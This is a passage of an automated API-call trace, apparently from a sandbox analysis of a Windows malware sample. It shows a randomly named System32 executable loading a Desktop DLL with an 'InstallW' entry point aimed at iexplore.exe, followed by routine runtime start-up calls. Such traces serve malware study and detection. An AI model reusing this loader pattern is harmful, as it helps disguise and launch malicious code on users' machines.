returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=InstallW /fn_args=\"iexplore.exe\"" [0036.083] GetEnvironmentStringsW () returned 0x2e78f0* [0036.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0036.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x2509f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0036.083] FreeEnvironmentStringsW (penv=0x2e78f0) returned 1 [0036.083] GetStartupInfoA (in: lpStartupInfo=0x16f374 | out: lpStartupInfo=0x16f374*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0036.083] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0036.084] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0036.084] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0036.084] SetHandleCount (uNumber=0x20) returned 0x20 [0036.084] GetLastError () returned 0x0 [0036.084] SetLastError (dwErrCode=0x0) [0036.084] GetLastError () returned 0x0 [0036.084] SetLastError (dwErrCode=0x0) [0036.084] GetLastError () returned 0x0 [0036.084] SetLastError (dwErrCode=0x0) [0036.084] GetACP () returned 0x4e4 [0036.084] GetLastError () returned 0x0 [0036.084] SetLastError (dwErrCode=0x0) [0036.084] IsValidCodePage (CodePage=0x4e4) returned 1 [0036.084] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x16f354 | out: lpCPInfo=0x16f354) returned 1 [0036.084] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x16ee20 | out: lpCPInfo=0x16ee20) returned 1 [0036.084] GetLastError () returned 0x0 [0036.084] SetLastError (dwErrCode=0x0) [0036.084] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x16edb0 | out: lpCharType=0x16edb0) returned 1 [0036.084] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x16f234, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0036.084] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x16f234, cbMultiByte=256, lpWideCharStr=0x16eb98, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0036.084] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x16ee34 | out: lpCharType=0x16ee34) returned 1 [0036.084] GetLastError () returned 0x0 [0036.084] SetLastError (dwErrCode=0x0) [0036.084] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0036.084] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x16f234, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0036.084] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x16f234, cbMultiByte=256, lpWideCharStr=0x16eb68, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ걍矲狰Ā") returned 256 [0036.084] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ걍矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0036.084] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ걍矲狰Ā", cchSrc=256, lpDestStr=0x16e958, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0036.084] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x16f134, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ:4\x8cõló\x16", lpUsedDefaultChar=0x0) returned 256 [0036.084] GetLastError () returned 0x0 [0036.084] SetLastError (dwErrCode=0x0) [0036.084] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x16f234, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0036.084] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x16f234, cbMultiByte=256, lpWideCharStr=0x16eb88, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ걍矲狰Ā") returned 256 [0036.084] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ걍矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0036.084] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ걍矲狰Ā", cchSrc=256, lpDestStr=0x16e978, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0036.084] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x16f034, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ:4\x8cõló\x16", lpUsedDefaultChar=0x0) returned 256 [0036.085] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0036.085] GetLastError () returned 0x0 [0036.085] SetLastError (dwErrCode=0x0) [0036.085] GetLastError () returned 0x0 [0036.085] SetLastError (dwErrCode=0x0) [0036.085] GetLastError () returned 0x0 [0036.085] SetLastError (dwErrCode=0x0) [0036.085] GetLastError () returned 0x0 [0036.085] SetLastError (dwErrCode=0x0) [0036.085] GetLastError () returned 0x0 [0036.085] SetLastError (dwErrCode=0x0) [0036.085] GetLastError () returned 0x0 [0036.085] SetLastError (dwErrCode=0x0) [0036.085] GetLastError () returned 0x0 [0036.085] SetLastError (dwErrCode=0x0) [0036.085] GetLastError () returned 0x0 [0036.085] SetLastError (dwErrCode=0x0) [0036.085] GetLastError () returned 0x0 [0036.085] SetLastError (dwErrCode=0x0) [0036.085] GetLastError () returned 0x0 [0036.085] SetLastError (dwErrCode=0x0) [0036.085] GetLastError () returned 0x0 [0036.085] SetLastError (dwErrCode=0x0) [0036.085] GetLastError () returned 0x0 [0036.085] SetLastError (dwErrCode=0x0) [0036.085] GetLastError () returned 0x0 [0036.085] SetLastError (dwErrCode=0x0) [0036.085] GetLastError () returned 0x0 [0036.085] SetLastError (dwErrCode=0x0) [0036.085] GetLastError () returned 0x0 [0036.085] SetLastError (dwErrCode=0x0) [0036.085] GetLastError () returned 0x0 [0036.086] SetLastError (dwErrCode=0x0) [0036.086] GetLastError () returned 0x0 [0036.086] SetLastError (dwErrCode=0x0) [0036.086] GetLastError () returned 0x0 [0036.086] SetLastError (dwErrCode=0x0) [0036.086] GetLastError () returned 0x0 [0036.086] SetLastError (dwErrCode=0x0) [0036.086] GetLastError () returned 0x0 [0036.086] SetLastError (dwErrCode=0x0) [0036.086] GetLastError () returned 0x0 [0036.086] SetLastError (dwErrCode=0x0) [0036.086] GetLastError () returned 0x0 [0036.086] SetLastError (dwErrCode=0x0) [0036.086] GetLastError () returned 0x0 [0036.086] SetLastError (dwErrCode=0x0) [0036.086] GetLastError () returned 0x0 [0036.086] SetLastError (dwErrCode=0x0) [0036.086] GetLastError () returned 0x0 [0036.086] SetLastError (dwErrCode=0x0) [0036.086] GetLastError () returned 0x0 [0036.086] SetLastError (dwErrCode=0x0) [0036.086] GetLastError () returned 0x0 [0036.086] SetLastError (dwErrCode=0x0) [0036.086] GetLastError () returned 0x0 [0036.086] SetLastError (dwErrCode=0x0) [0036.086] GetLastError () returned 0x0 [0036.086] SetLastError (dwErrCode=0x0) [0036.086] GetLastError () returned 0x0 [0036.086] SetLastError (dwErrCode=0x0) [0036.086] GetLastError () returned 0x0 [0036.086] SetLastError (dwErrCode=0x0) [0036.086] GetLastError () returned 0x0 [0036.086] SetLastError (dwErrCode=0x0) [0036.086] GetLastError () returned 0x0 [0036.087] SetLastError (dwErrCode=0x0) [0036.087] GetLastError () returned 0x0 [0036.087] SetLastError (dwErrCode=0x0) [0036.087] GetLastError () returned 0x0 [0036.087] SetLastError (dwErrCode=0x0) [0036.087] GetLastError () returned 0x0 [0036.087] SetLastError (dwErrCode=0x0) [0036.087] GetLastError () returned 0x0 [0036.087] SetLastError (dwErrCode=0x0) [0036.087] GetLastError () returned 0x0 [0036.087] SetLastError (dwErrCode=0x0) [0036.087] GetLastError () returned 0x0 [0036.087] SetLastError (dwErrCode=0x0) [0036.087] GetLastError () returned 0x0 [0036.087] SetLastError (dwErrCode=0x0) [0036.087] GetLastError () returned 0x0 [0036.087] SetLastError (dwErrCode=0x0) [0036.087] GetLastError () returned 0x0 [0036.087] SetLastError (dwErrCode=0x0) [0036.087] GetLastError () returned 0x0 [0036.087] SetLastError (dwErrCode=0x0) [0036.087] GetLastError () returned 0x0 [0036.087] SetLastError (dwErrCode=0x0) [0036.087] GetLastError () returned 0x0 [0036.087] SetLastError (dwErrCode=0x0) [0036.087] GetLastError () returned 0x0 [0036.087] SetLastError (dwErrCode=0x0) [0036.087] GetLastError () returned 0x0 [0036.087] SetLastError (dwErrCode=0x0) [0036.087] GetLastError () returned 0x0 [0036.087] SetLastError (dwErrCode=0x0) [0036.087] GetLastError () returned 0x0 [0036.087] SetLastError (dwErrCode=0x0) [0036.087] GetLastError () returned 0x0 [0036.087] SetLastError (dwErrCode=0x0) [0036.088] GetLastError () returned 0x0 [0036.088] SetLastError (dwErrCode=0x0) [0036.088] GetLastError () returned 0x0 [0036.088] SetLastError (dwErrCode=0x0) [0036.088] GetLastError () returned 0x0 [0036.088] SetLastError (dwErrCode=0x0) [0036.088] GetLastError () returned 0x0 [0036.088] SetLastError (dwErrCode=0x0) [0036.088] GetLastError () returned 0x0 [0036.088] SetLastError (dwErrCode=0x0) [0036.088] GetLastError () returned 0x0 [0036.088] SetLastError (dwErrCode=0x0) [0036.088] GetLastError () returned 0x0 [0036.088] SetLastError (dwErrCode=0x0) [0036.088] GetLastError () returned 0x0 [0036.088] SetLastError (dwErrCode=0x0) [0036.088] GetLastError () returned 0x0 [0036.088] SetLastError (dwErrCode=0x0) [0036.088] GetLastError () returned 0x0 [0036.088] SetLastError (dwErrCode=0x0) [0036.088] GetLastError () returned 0x0 [0036.088] SetLastError (dwErrCode=0x0) [0036.088] GetLastError () returned 0x0 [0036.088] SetLastError (dwErrCode=0x0) [0036.088] GetLastError () returned 0x0 [0036.088] SetLastError (dwErrCode=0x0) [0036.088] GetLastError () returned 0x0 [0036.088] SetLastError (dwErrCode=0x0) [0036.088] GetLastError () returned 0x0 [0036.088] SetLastError (dwErrCode=0x0) [0036.088] GetLastError () returned 0x0 [0036.088] SetLastError (dwErrCode=0x0) [0036.088] GetLastError () returned 0x0 [0036.088] SetLastError (dwErrCode=0x0) [0036.088] GetLastError () returned 0x0 [0036.089] SetLastError (dwErrCode=0x0) [0036.089] GetLastError () returned 0x0 [0036.089] SetLastError (dwErrCode=0x0) [0036.089] GetLastError () returned 0x0 [0036.089] SetLastError (dwErrCode=0x0) [0036.089] GetLastError () returned 0x0 [0036.089] SetLastError (dwErrCode=0x0) [0036.089] GetLastError () returned 0x0 [0036.089] SetLastError (dwErrCode=0x0) [0036.089] GetLastError () returned 0x0 [0036.089] SetLastError (dwErrCode=0x0) [0036.089] GetLastError () returned 0x0 [0036.089] SetLastError (dwErrCode=0x0) [0036.089] GetLastError () returned 0x0 [0036.089] SetLastError (dwErrCode=0x0) [0036.089] GetLastError () returned 0x0 [0036.089] SetLastError (dwErrCode=0x0) [0036.089] GetLastError () returned 0x0 [0036.089] SetLastError (dwErrCode=0x0) [0036.089] GetLastError () returned 0x0 [0036.089] SetLastError (dwErrCode=0x0) [0036.089] GetLastError () returned 0x0 [0036.089] SetLastError (dwErrCode=0x0) [0036.089] GetLastError () returned 0x0 [0036.089] SetLastError (dwErrCode=0x0) [0036.089] GetLastError () returned 0x0 [0036.089] SetLastError (dwErrCode=0x0) [0036.089] GetLastError () returned 0x0 [0036.089] SetLastError (dwErrCode=0x0) [0036.089] GetLastError () returned 0x0 [0036.089] SetLastError (dwErrCode=0x0) [0036.089] GetLastError () returned 0x0 [0036.089] SetLastError (dwErrCode=0x0) [0036.089] GetLastError () returned 0x0 [0036.090] SetLastError (dwErrCode=0x0) [0036.090] GetLastError () returned 0x0 [0036.090] SetLastError (dwErrCode=0x0) [0036.090] GetLastError () returned 0x0 [0036.090] SetLastError (dwErrCode=0x0) [0036.090] GetLastError () returned 0x0 [0036.090] SetLastError (dwErrCode=0x0) [0036.090] GetLastError () returned 0x0 [0036.090] SetLastError (dwErrCode=0x0) [0036.090] GetLastError () returned 0x0 [0036.090] SetLastError (dwErrCode=0x0) [0036.090] GetLastError () returned 0x0 [0036.090] SetLastError (dwErrCode=0x0) [0036.090] GetLastError () returned 0x0 [0036.090] SetLastError (dwErrCode=0x0) [0036.090] GetLastError () returned 0x0 [0036.090] SetLastError (dwErrCode=0x0) [0036.090] GetLastError () returned 0x0 [0036.090] SetLastError (dwErrCode=0x0) [0036.090] GetLastError () returned 0x0 [0036.090] SetLastError (dwErrCode=0x0) [0036.090] GetLastError () returned 0x0 [0036.090] SetLastError (dwErrCode=0x0) [0036.090] GetLastError () returned 0x0 [0036.090] SetLastError (dwErrCode=0x0) [0036.090] GetLastError () returned 0x0 [0036.090] SetLastError (dwErrCode=0x0) [0036.090] GetLastError () returned 0x0 [0036.090] SetLastError (dwErrCode=0x0) [0036.090] GetLastError () returned 0x0 [0036.090] SetLastError (dwErrCode=0x0) [0036.090] GetLastError () returned 0x0 [0036.090] SetLastError (dwErrCode=0x0) [0036.090] GetLastError () returned 0x0 [0036.090] SetLastError (dwErrCode=0x0) [0036.091] GetLastError () returned 0x0 [0036.091] SetLastError (dwErrCode=0x0) [0036.091] GetLastError () returned 0x0 [0036.091] SetLastError (dwErrCode=0x0) [0036.091] GetLastError () returned 0x0 [0036.091] SetLastError (dwErrCode=0x0) [0036.091] GetLastError () returned 0x0 [0036.091] SetLastError (dwErrCode=0x0) [0036.091] GetLastError () returned 0x0 [0036.091] SetLastError (dwErrCode=0x0) [0036.091] GetLastError () returned 0x0 [0036.091] SetLastError (dwErrCode=0x0) [0036.091] GetLastError () returned 0x0 [0036.091] SetLastError (dwErrCode=0x0) [0036.091] GetLastError () returned 0x0 [0036.091] SetLastError (dwErrCode=0x0) [0036.091] GetLastError () returned 0x0 [0036.091] SetLastError (dwErrCode=0x0) [0036.091] GetLastError () returned 0x0 [0036.091] SetLastError (dwErrCode=0x0) [0036.091] GetLastError () returned 0x0 [0036.091] SetLastError (dwErrCode=0x0) [0036.091] GetLastError () returned 0x0 [0036.091] SetLastError (dwErrCode=0x0) [0036.091] GetLastError () returned 0x0 [0036.091] SetLastError (dwErrCode=0x0) [0036.091] GetLastError () returned 0x0 [0036.091] SetLastError (dwErrCode=0x0) [0036.091] GetLastError () returned 0x0 